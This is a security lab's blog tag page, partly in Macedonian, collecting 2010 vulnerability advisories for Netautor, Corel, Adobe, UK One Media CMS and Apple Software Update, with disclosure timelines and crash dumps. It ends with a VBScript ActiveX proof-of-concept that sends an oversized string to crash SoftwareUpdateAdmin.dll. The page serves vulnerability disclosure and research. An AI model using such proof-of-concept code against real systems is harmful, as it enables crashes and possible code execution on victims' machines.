Posts Tagged ‘ report

Netautor Professional 5.5.0 (goback) XSS Vulnerability

Vendor: /digiconcept/
Product web page: http://www.digiconcept.net
Affected version: 5.5.0 and DW 5.3.1

Summary: Netautor Professional is an application server and
development environment. Netautor Professional was developed
to serve the practical needs of users, and was continuously
advanced.

Digital Workroom is a well proven and time-tested Content Management
System. It`s based on also digiconcept`s developed Application Server
“Netautor Professional” and PHP 5. The standard functional range covers
the majoritarian needs on Internet- and Intranet environments for publication
and communication.

Desc: Netautor Professional v5.5.0 suffers from a XSS vulnerability because
input passed via the “goback” parameter to login2.php script is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user’s browser session in context of an
affected site.

Tested on: MS WinXP Pro SP3 (EN)
PHP 5.3.0
MySQL 5.1.36
Apache 2.2.11 (Win32)

Vendor status: [14.09.2010] Vulnerability discovered.
[15.09.2010] Contact with the vendor.
[17.09.2010] No reply from vendor.
[17.09.2010] Public advisory released.

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4964.php

Multiple Vendors DLL Hijacking Exploits

Токму така :)

H D Moore (Metasploit Project) по изјавувањето дека пронашол 40-тина ранливости во Microsoft производи, на 22-ри август го објави и приборот за ревизија на DLL библиотеките и нивно “киднапирање” или hijacking. Се работи за DLLHijackAuditKit v2 со кој извршувате проверка за сите екстензии регистрирани во вашиот систем и нивни соодветни библиотеки, како и нивна експлоатација. Приборот се користи едноставно, ревизијата трае од 15-30 минути и потоа се креираат експлоатациски кодови во фолдер Exploits кои можете да ги користите за било какви цели :)

Повеќе: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html и http://blog.metasploit.com/2010/08/better-faster-stronger.html.

Се разбира, тимот на Zero Science Lab за да не остане покус, изврши ревизија и на еден од своите лабораториските системи и пронајде доста ранливости кои следуваат…

- Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

- Adobe Extension Manager CS5 v5.0.298 (dwmapi.dll) DLL Hijacking Exploit

- Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

- CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

- Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

- Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit

- Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

- Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit

Откако беше објавен DLL Hijack Audit Kit v2 приборот, во светот се објавија повеќе од 100-тина експлоити во рок од неколку дена, поради кое, Microsoft реагираше веднаш со објавување на алатка која ги заобиколуваше овие слабости.

Извор: http://www.computerworld.com/s/article/9181518/Microsoft_releases_tool_to_block_DLL_load_hijacking_attacks?taxonomyId=17&pageNumber=1

Алатката можете да ја преземете на следниов линк: http://support.microsoft.com/kb/2264107 (услов: валиден оперативен систем)

Вакви експлоити сеуште се објавуваат додека го читате текстов и е застрашувачки. Внимавајте од кого преземате податоци и бидете безбедни.

Досега, најбрзо објавување на ваквите експлоити можете да ги пратите на Exploit-DB: http://www.exploit-db.com/local/

Zero Science Lab

Corel WordPerfect Office X5 and Corel Presentations X5 File Handling Vulnerabilities

- Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

– Corel Presentations X5 15.0.0.357 (shw) Remote Buffer Preoccupation PoC

Corel Corporation

http://www.corel.com

Version: 15.0.0.357 (Standard Edition)

– Summary: Corel® WordPerfect® Office X5 – Standard Edition is the essential
office suite for word processing, spreadsheets, presentations and email.
Chosen over Microsoft® Office by millions of longtime users, it integrates
the latest productivity software with the best of the Web. Work faster and
collaborate more efficiently with all-new Web services, new Microsoft® Office
SharePoint® support, more PDF tools and even better compatibility with Microsoft
Office. It’s everything you expect in an office suite—for less.

– Desc: Corel WordPerfect and Corel Presentations X5 is prone to a remote buffer overflow vulnerability because
the application fails to perform adequate boundary checks on user supplied input with
.WPD (WordPerfect Document) and .SHW (Presentations Slide Show) file. Attackers may exploit this issue to execute arbitrary
code in the context of the application. Failed attacks will cause denial-of-service
conditions.

– Tested On: Microsoft Windows XP Professional SP3 (English)

– Vulnerability Discovered By: Gjoko ‘LiquidWorm’ Krstic

– liquidworm gmail com

– Zero Science Lab – http://www.zeroscience.mk

– 09.07.2010

– Vendor status:

[09.07.2010] Vulnerability discovered.
[09.07.2010] Initial contact with the vendor.
[12.07.2010] No reply from vendor.
[12.07.2010] Public advisory released.

Details:

Corel Presentations X5 15.0.0.357 (shw) Remote Buffer Preoccupation PoC
Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability

Title:

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability

Summary:

Adobe Reader software is the global standard for electronic document sharing. It is the only PDF
file viewer that can open and interact with all PDF documents. Use Adobe Reader to view, search,
digitally sign, verify, print, and collaborate on Adobe PDF files.

Vendor:

Adobe Systems Incorporated

Product Web Page:

http://www.adobe.com/

Version tested:

9.3.2
9.3.1

Description:

Adobe Reader suffers from a remote memory corruption vulnerability that causes the application to
crash while processing the malicious .PDF file. The issue is triggered when the reader tries to
initialize the CoolType Typography Engine (cooltype.dll). This vulnerability also affects and crashes
major browsers like: Mozilla Firefox, Opera and Apple Safari. Google Chrome & IE does not crash.
Talking about Blended Threat Vulnerabilities ;).

———————————————————————————–

(bd0.e14): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=313100ee ebx=0211a722 ecx=00000031 edx=02e091a4 esi=00017e58 edi=00000000
eip=08075dc2 esp=0012d478 ebp=0012d488 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
CoolType!CTInit+0x2f827:
08075dc2 660fb644322c movzx ax,byte ptr [edx+esi+2Ch] ds:0023:02e21028=??

———————————————————————————–

Tested On:

Microsoft Windows XP Professional SP3 (English)
Microsoft Windows XP Professional SP2 (English)
Microsoft Windows 7 Ultimate
GNU/Linux Ubuntu Desktop 9.10 (i386) 32-bit
GNU/Linux Fedora 10 (Cambridge) / 2.6.27.41-170.2.117.fc10.i686

Vendor Status:

18.04.2010 – Vendor informed.
18.04.2010 – Vendor replied.
07.05.2010 – Asked vendor for confirmation.
07.05.2010 – Vendor confirms vulnerability.
03.06.2010 – Asked vendor for status.
03.06.2010 – Vendor replied.
24.06.2010 – Vendor reveals patch release date.
29.06.2010 – Coordinated public advisory.

Advisory Details:

Zero Science Lab Advisory ID: ZSL-2010-4943
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4943.php
Adobe Advisory ID: APSB10-15
Advisory: http://www.adobe.com/support/security/bulletins/apsb10-15.html
CVE ID: CVE-2010-2204

Live Demo:

http://www.zeroscience.mk/codes/thricer.pdf

Vulnerability Discovered By:

Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

Повеќе: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4943.php

UK One Media CMS (id) Error Based SQL Injection Vulnerability

Summary: Content Management System (PHP+MySQL)

Vendor: UK One Media – http://www.uk1media.com

Desc: UK One Media CMS suffers from an sql injection vulnerability when parsing query from the id param which results in compromising the entire database structure and executing system commands.

Tested on Apache 2.x (linux), PHP/5.2.11 and MySQL/4.1.22

More details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4942.php

Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability

Vendor: Adobe Systems Inc.

Product Web Page: http://www.adobe.com

Version tested: CS3 10.0

Summary: Adobe® InDesign® CS3 software provides precise control over typography and built-in creative tools for designing, preflighting, and publishing documents for print, online, or to mobile devices. Include interactivity, animation, video, and sound in page layouts to fully engage readers.

Desc: When parsing .indd files to the application, it crashes instantly overwriting memory registers. Depending on the offset, EBP, EDI, EDX and ESI gets overwritten. Pottential vulnerability use is arbitrary code execution and denial of service.

Tested on Microsoft Windows XP Professional SP3 (English)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

16.09.2009

Vendor status:

[16.09.2009] Vulnerability discovered.
[09.03.2010] Vulnerability reported to vendor with sent PoC files.
[21.03.2010] Asked confirmation from the vendor.
[21.03.2010] Vendor asked for PoC files due to communication errors.
[22.03.2010] Re-sent PoC files to vendor.
[04.04.2010] Vendor confirms vulnerability.
[03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
[04.06.2010] Public advisory released.

Zero Science Lab Advisory ID: ZSL-2010-4941

More info: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4941.php

Security Threat Report: 2010 [Sophos]

The first decade of the 21st century saw a dramatic change in the nature of cybercrime. Once the province of teenage boys spreading graffiti for kicks and notoriety, hackers today are organized, financially motivated gangs. In the past, virus writers displayed offensive images and bragged about the malware they had written; now hackers target companies to steal intellectual property, build complex networks of compromised PCs and rob individuals of their identities.
2009 saw Facebook, Twitter and other social networking sites solidify their position at the heart of many users’ daily internet activities, and saw these websites become a primary target for hackers. Because of this, social networks have become one of the most significant vectors for data loss and identity theft.
New computing platforms also emerged last year, and shortly thereafter fell victim to cybercriminal activities. What was lost was once again found in 2009, as old hacking techniques re-emerged as means to penetrate data protection.

By understanding the problems that have arisen in the past, perhaps internet users can craft themselves a better, safer future.

Read full report: SophosSecReport2010.pdf

На прагот на Apple.com

Извршивме мала анализа на две три апликации на Apple и најдовме некое мало “багче” во апликацијата Apple Software Update за Windows платформа, поточно во SoftwareUpdateAdmin.dll библиотеката.

Ништо страшно но сепак контакиравме со Apple Product Security Team (http://www.apple.com/support/security/) со детални информации, и како што се надевавме, ни одговорија веднаш изјавувајќи дека не се работи за ништо сериозно што би влијаело директно врз безбедноста на системот.

Со помош на COMRaider алатката, изработена од iDefense, за скенирање на COM објекти (ActiveX, OCX) и нивно … fuzzing, беше најден исклучок (exception) VC_THROW_SEH…


Exception Code: VC_THROW_SEH
Disasm: 7C812AEB POP ESI (KERNEL32.dll)


Seh Chain:
--------------------------------------------------
1 10020105 SoftwareUpdateAdmin.DLL
2 1001FFE6 SoftwareUpdateAdmin.DLL
3 73352526 VBSCRIPT.dll
4 7C839AC0 KERNEL32.dll


Called From Returns To
--------------------------------------------------
KERNEL32.7C812AEB SoftwareUpdateAdmin.1000B7AA
SoftwareUpdateAdmin.1000B7AA SoftwareUpdateAdmin.10009345
SoftwareUpdateAdmin.10009345 SoftwareUpdateAdmin.100082FF


Registers:
--------------------------------------------------
EIP 7C812AEB -> E06D7363 -> Asc: csmcsm
EAX 0013E7C8 -> E06D7363 -> Asc: csmcsm
EBX 00000000
ECX 00000000
EDX 00000000
EDI 00000000
ESI 0013E850 -> 0013E8D4
EBP 0013E818 -> 0013E850
ESP 0013E7C4 -> 00F83E2C -> Asc: ,>,>


Block Disassembly:
--------------------------------------------------
7C812ADB LEA EDI,[EBP-3C]
7C812ADE REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
7C812AE0 POP EDI
7C812AE1 LEA EAX,[EBP-50]
7C812AE4 PUSH EAX
7C812AE5 CALL [7C801510]
7C812AEB POP ESI <--- CRASH
7C812AEC LEAVE 7C812AED RETN 10
7C812AF0 TEST EDI,EDI
7C812AF2 JLE 7C80BE2E
7C812AF8 MOV EDX,[EBP-4]
7C812AFB MOV [EBP+C],EDX
7C812AFE MOVZX EDX,WORD PTR [ESI]
7C812B01 MOV EDI,[EBP-8]


ArgDump:
--------------------------------------------------
EBP+8 E06D7363
EBP+12 00000001
EBP+16 00000003
EBP+20 0013E844 -> 19930520
EBP+24 E06D7363
EBP+28 00000001



Stack Dump:
--------------------------------------------------
13E7C4 2C 3E F8 00 63 73 6D E0 01 00 00 00 00 00 00 00 [....csm.........]
13E7D4 EB 2A 81 7C 03 00 00 00 20 05 93 19 AC E8 13 00 [................]
13E7E4 E8 7C 02 10 F0 C3 4E 77 28 E8 13 00 CD F7 52 77 [......Nw......Rw]
13E7F4 80 91 18 00 00 00 00 00 5C 1A 4E 77 20 E8 13 00 [........\.Nw....]
13E804 AA 88 51 77 78 91 18 00 00 00 00 00 C0 E8 13 00 [..Qw............]


CompanyName Apple Inc.
FileDescription Apple Software Update
FileVersion 2.1.1.116
InternalName SoftwareUpdateAdmin.dll
LegalCopyright (c) 2006-2008 Apple Inc. All rights reserved.
OriginalFileName SoftwareUpdateAdmin.dll
ProductName Apple Software Update
ProductVersion 2.1.1.116


Report for Clsid: {BB46F03E-7CD2-489F-8F95-BB950F395FDB}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: False


----------------------poc----------------------


<object classid='clsid:BB46F03E-7CD2-489F-8F95-BB950F395FDB' id='target' />
<script language='vbscript'>


targetFile = "C:\Program Files\Apple Software Update\SoftwareUpdateAdmin.dll"
prototype  = "Sub CreateTaskWithTrigger2 ( ByVal taskPath As String ,  ByVal launchParameters As String ,  ByVal frequency As Long )"
memberName = "CreateTaskWithTrigger2"
progid     = "SoftwareUpdateAdminLib.ASUTaskScheduler"
argCount   = 3


arg1=String(12308, "A")
arg2="defaultV"
arg3=1

target.CreateTaskWithTrigger2 arg1 ,arg2 ,arg3
</script>

----------------------poc----------------------


Discovered on: 15.03.2010

;)